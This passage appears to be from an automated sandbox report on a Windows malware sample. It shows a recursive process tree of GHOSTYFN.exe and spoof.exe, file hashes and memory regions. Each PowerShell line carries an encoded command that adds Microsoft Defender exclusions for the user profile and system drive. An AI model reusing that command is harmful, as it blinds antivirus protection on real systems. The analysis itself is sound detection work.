                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAbAB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwBrACMAPgA="
                                                                                                                                                              29⤵
                                                                                                                                                                PID:5524
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe"
                                                                                                                                                                29⤵
                                                                                                                                                                  PID:5688
                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAbAB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwBrACMAPgA="
                                                                                                                                                                    30⤵
                                                                                                                                                                      PID:6100
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe"
                                                                                                                                                                      30⤵
                                                                                                                                                                        PID:5720
                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAbAB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwBrACMAPgA="
                                                                                                                                                                          31⤵
                                                                                                                                                                            PID:6384
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe"
                                                                                                                                                                            31⤵
                                                                                                                                                                              PID:6416
                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAbAB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwBrACMAPgA="
                                                                                                                                                                                32⤵
                                                                                                                                                                                  PID:6644
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe"
                                                                                                                                                                                  32⤵
                                                                                                                                                                                    PID:6652
                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAbAB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwBrACMAPgA="
                                                                                                                                                                                      33⤵
                                                                                                                                                                                        PID:6832
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe"
                                                                                                                                                                                        33⤵
                                                                                                                                                                                          PID:6844
                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAbAB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwBrACMAPgA="
                                                                                                                                                                                            34⤵
                                                                                                                                                                                              PID:7128
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe"
                                                                                                                                                                                              34⤵
                                                                                                                                                                                                PID:7148
                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAbAB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwBrACMAPgA="
                                                                                                                                                                                                  35⤵
                                                                                                                                                                                                    PID:6592
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe"
                                                                                                                                                                                                    35⤵
                                                                                                                                                                                                      PID:6636
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAbAB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwBrACMAPgA="
                                                                                                                                                                                                        36⤵
                                                                                                                                                                                                          PID:7088
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe"
                                                                                                                                                                                                          36⤵
                                                                                                                                                                                                            PID:7096
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\spoof.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\spoof.exe"
                                                                                                                                                                                                            36⤵
                                                                                                                                                                                                              PID:2228
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\spoof.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\spoof.exe"
                                                                                                                                                                                                            35⤵
                                                                                                                                                                                                              PID:6664
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\spoof.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\spoof.exe"
                                                                                                                                                                                                            34⤵
                                                                                                                                                                                                              PID:6024
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\spoof.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\spoof.exe"
                                                                                                                                                                                                            33⤵
                                                                                                                                                                                                              PID:6852
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\spoof.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\spoof.exe"
                                                                                                                                                                                                            32⤵
                                                                                                                                                                                                              PID:6704
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\spoof.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\spoof.exe"
                                                                                                                                                                                                            31⤵
                                                                                                                                                                                                              PID:6476
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\spoof.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\spoof.exe"
                                                                                                                                                                                                            30⤵
                                                                                                                                                                                                              PID:6156
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\spoof.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\spoof.exe"
                                                                                                                                                                                                            29⤵
                                                                                                                                                                                                              PID:3660
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\spoof.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\spoof.exe"
                                                                                                                                                                                                            28⤵
                                                                                                                                                                                                              PID:5796
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\spoof.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\spoof.exe"
                                                                                                                                                                                                            27⤵
                                                                                                                                                                                                              PID:5984
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\spoof.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\spoof.exe"
                                                                                                                                                                                                            26⤵
                                                                                                                                                                                                              PID:5736
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\spoof.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\spoof.exe"
                                                                                                                                                                                                            25⤵
                                                                                                                                                                                                              PID:4712
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\spoof.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\spoof.exe"
                                                                                                                                                                                                            24⤵
                                                                                                                                                                                                              PID:1532
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\spoof.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\spoof.exe"
                                                                                                                                                                                                            23⤵
                                                                                                                                                                                                              PID:5552
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\spoof.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\spoof.exe"
                                                                                                                                                                                                            22⤵
                                                                                                                                                                                                              PID:3360
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\spoof.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\spoof.exe"
                                                                                                                                                                                                            21⤵
                                                                                                                                                                                                              PID:5884
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\spoof.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\spoof.exe"
                                                                                                                                                                                                            20⤵
                                                                                                                                                                                                              PID:5592
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\spoof.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\spoof.exe"
                                                                                                                                                                                                            19⤵
                                                                                                                                                                                                              PID:5252
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\spoof.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\spoof.exe"
                                                                                                                                                                                                            18⤵
                                                                                                                                                                                                              PID:4136
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\spoof.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\spoof.exe"
                                                                                                                                                                                                            17⤵
                                                                                                                                                                                                              PID:1252
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\spoof.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\spoof.exe"
                                                                                                                                                                                                            16⤵
                                                                                                                                                                                                              PID:2824
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\spoof.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\spoof.exe"
                                                                                                                                                                                                            15⤵
                                                                                                                                                                                                              PID:2740
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\spoof.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\spoof.exe"
                                                                                                                                                                                                            14⤵
                                                                                                                                                                                                              PID:2620
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\spoof.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\spoof.exe"
                                                                                                                                                                                                            13⤵
                                                                                                                                                                                                              PID:1660
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\spoof.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\spoof.exe"
                                                                                                                                                                                                            12⤵
                                                                                                                                                                                                              PID:516
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\spoof.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\spoof.exe"
                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                              PID:1884
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\spoof.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\spoof.exe"
                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                              PID:4848
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\spoof.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\spoof.exe"
                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                              PID:1512
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\spoof.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\spoof.exe"
                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                              PID:1684
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\spoof.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\spoof.exe"
                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                              PID:1252
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\spoof.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\spoof.exe"
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                              PID:2948
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\spoof.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\spoof.exe"
                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                              PID:1192
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\spoof.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\spoof.exe"
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                            PID:1880
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\spoof.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\spoof.exe"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                          PID:2492
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\spoof.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\spoof.exe"
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                        PID:3096
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Speech\AudioDriver.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Microsoft\Speech\AudioDriver.exe"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:3892

                                                                                                                                                                                                      Network

                                                                                                                                                                                                      MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                      Replay Monitor

                                                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                                                      Downloads

                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\spoof.exe.log

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        805B

                                                                                                                                                                                                        MD5

                                                                                                                                                                                                        58a9108e39c2ea50e65c23be3a9407cf

                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                        fb21f7b9330aa1a77080a3243b81b49035102d7b

                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                        6049be83020702896a539b5c8c13270add224d7b91b3ee0bebc328791b74a84b

                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                        93804ee8a4560503e47c07f5fa4a959e23355a01aba406c103d339debc9b2b1d20a345cdbb8d8069dac97b9151f228cf559ac3dde1500e3484fba1a4126842bf

                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        53KB

                                                                                                                                                                                                        MD5

                                                                                                                                                                                                        124edf3ad57549a6e475f3bc4e6cfe51

                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                        80f5187eeebb4a304e9caa0ce66fcd78c113d634

                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                        638c51e173ca6b3469494a7e2e0b656021a761f77b4a83f3e430e82e7b9af675

                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                        b6c1a9051feeffad54ba1092fd799d34a9578368d7e66b31780fe478c1def0eb4094dce2879003f7389f2f9d86b94a3ef3975e78092a604597841c9b8db120ee

                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wvcakmu4.0q2.ps1

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        60B

                                                                                                                                                                                                        MD5

                                                                                                                                                                                                        d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\spoof.exe

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        1.2MB

                                                                                                                                                                                                        MD5

                                                                                                                                                                                                        d66d5168a0fb7326e23963f4e8502e32

                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                        8e5d448ff498a01afc000f9be8a3d5a6591c2a9a

                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                        7d0f79a9febca115226349613a122d06c83e4fc9b8d955e6cc7654bad357ff9e

                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                        5a06b4c83cdee5ff2d6b7c914a021c8e7f43370f2ee3a63d376fbf568648a162098b956d3eb1fe9cf5920c269868f40fc0dc43f73ac7413039eea71056a9eb19

                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\GamerView\sqlite3.dll

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        626KB

                                                                                                                                                                                                        MD5

                                                                                                                                                                                                        d8aec01ff14e3e7ad43a4b71e30482e4

                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                        e3015f56f17d845ec7eef11d41bbbc28cc16d096

                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                        da1d608be064555ab3d3d35e6db64527b8c44f3fa5ddd7c3ec723f80fc99736e

                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                        f5b2f4bda0cc13e1d1c541fb0caea14081ee4daffd497e31a3d4d55d5f9d85a61158b4891a6527efe623b2f32b697ac912320d9be5c0303812ca98dcc8866fcf

                                                                                                                                                                                                      • memory/760-146-0x00000000072B0000-0x00000000072BA000-memory.dmp

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        40KB

                                                                                                                                                                                                      • memory/760-14-0x0000000005140000-0x0000000005768000-memory.dmp

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        6.2MB

                                                                                                                                                                                                      • memory/760-147-0x00000000074D0000-0x0000000007566000-memory.dmp

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        600KB

                                                                                                                                                                                                      • memory/760-20-0x0000000004F30000-0x0000000004F52000-memory.dmp

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        136KB

                                                                                                                                                                                                      • memory/760-21-0x00000000050D0000-0x0000000005136000-memory.dmp

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        408KB

                                                                                                                                                                                                      • memory/760-115-0x0000000007860000-0x0000000007EDA000-memory.dmp

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        6.5MB

                                                                                                                                                                                                      • memory/760-27-0x00000000058E0000-0x0000000005C34000-memory.dmp

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        3.3MB

                                                                                                                                                                                                      • memory/760-125-0x0000000007220000-0x000000000723A000-memory.dmp

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        104KB

                                                                                                                                                                                                      • memory/760-22-0x0000000005870000-0x00000000058D6000-memory.dmp

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        408KB

                                                                                                                                                                                                      • memory/760-103-0x0000000007100000-0x00000000071A3000-memory.dmp

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        652KB

                                                                                                                                                                                                      • memory/760-58-0x0000000005EF0000-0x0000000005F0E000-memory.dmp

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        120KB

                                                                                                                                                                                                      • memory/760-64-0x0000000006410000-0x000000000645C000-memory.dmp

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        304KB

                                                                                                                                                                                                      • memory/760-13-0x0000000004950000-0x0000000004986000-memory.dmp

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        216KB

                                                                                                                                                                                                      • memory/760-91-0x00000000064C0000-0x00000000064F2000-memory.dmp

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        200KB

                                                                                                                                                                                                      • memory/760-92-0x0000000070500000-0x000000007054C000-memory.dmp

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        304KB

                                                                                                                                                                                                      • memory/760-102-0x00000000064A0000-0x00000000064BE000-memory.dmp

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        120KB

                                                                                                                                                                                                      • memory/1276-325-0x0000000070500000-0x000000007054C000-memory.dmp

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        304KB

                                                                                                                                                                                                      • memory/1588-202-0x0000000007EA0000-0x0000000007EB4000-memory.dmp

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        80KB

                                                                                                                                                                                                      • memory/1588-229-0x0000000007ED0000-0x0000000007ED8000-memory.dmp

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        32KB

                                                                                                                                                                                                      • memory/1588-214-0x0000000007F80000-0x0000000007F9A000-memory.dmp

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        104KB

                                                                                                                                                                                                      • memory/1588-136-0x0000000070500000-0x000000007054C000-memory.dmp

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        304KB

                                                                                                                                                                                                      • memory/1588-201-0x0000000007E90000-0x0000000007E9E000-memory.dmp

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        56KB

                                                                                                                                                                                                      • memory/1648-315-0x0000000070500000-0x000000007054C000-memory.dmp

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        304KB

                                                                                                                                                                                                      • memory/1980-295-0x0000000070500000-0x000000007054C000-memory.dmp

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        304KB

                                                                                                                                                                                                      • memory/2240-264-0x0000000070500000-0x000000007054C000-memory.dmp

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        304KB

                                                                                                                                                                                                      • memory/2312-346-0x0000000070500000-0x000000007054C000-memory.dmp

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        304KB

                                                                                                                                                                                                      • memory/3096-18-0x0000000005190000-0x00000000051DC000-memory.dmp

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        304KB

                                                                                                                                                                                                      • memory/3096-15-0x0000000001110000-0x000000000111A000-memory.dmp

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        40KB

                                                                                                                                                                                                      • memory/3096-17-0x00000000054D0000-0x0000000005562000-memory.dmp

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        584KB

                                                                                                                                                                                                      • memory/3096-12-0x00000000005D0000-0x0000000000702000-memory.dmp

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        1.2MB

                                                                                                                                                                                                      • memory/3096-16-0x00000000057E0000-0x0000000005D84000-memory.dmp

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        5.6MB

                                                                                                                                                                                                      • memory/3096-23-0x0000000005570000-0x0000000005628000-memory.dmp

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        736KB

                                                                                                                                                                                                      • memory/3096-26-0x0000000005440000-0x000000000548E000-memory.dmp

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        312KB

                                                                                                                                                                                                      • memory/3840-158-0x0000000007CC0000-0x0000000007CD1000-memory.dmp

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        68KB

                                                                                                                                                                                                      • memory/3840-105-0x0000000070500000-0x000000007054C000-memory.dmp

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        304KB

                                                                                                                                                                                                      • memory/3892-265-0x0000000060900000-0x0000000060992000-memory.dmp

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        584KB

                                                                                                                                                                                                      • memory/3892-190-0x0000000006D70000-0x0000000006D7A000-memory.dmp

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        40KB

                                                                                                                                                                                                      • memory/3892-181-0x0000000005E70000-0x0000000005E80000-memory.dmp

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        64KB

                                                                                                                                                                                                      • memory/3892-180-0x0000000006600000-0x00000000067C2000-memory.dmp

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        1.8MB

                                                                                                                                                                                                      • memory/4052-191-0x0000000070500000-0x000000007054C000-memory.dmp

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        304KB

                                                                                                                                                                                                      • memory/4332-244-0x0000000070500000-0x000000007054C000-memory.dmp

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        304KB

                                                                                                                                                                                                      • memory/4472-204-0x0000000070500000-0x000000007054C000-memory.dmp

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        304KB

                                                                                                                                                                                                      • memory/4512-169-0x0000000070500000-0x000000007054C000-memory.dmp

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        304KB

                                                                                                                                                                                                      • memory/4780-371-0x0000000070500000-0x000000007054C000-memory.dmp

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        304KB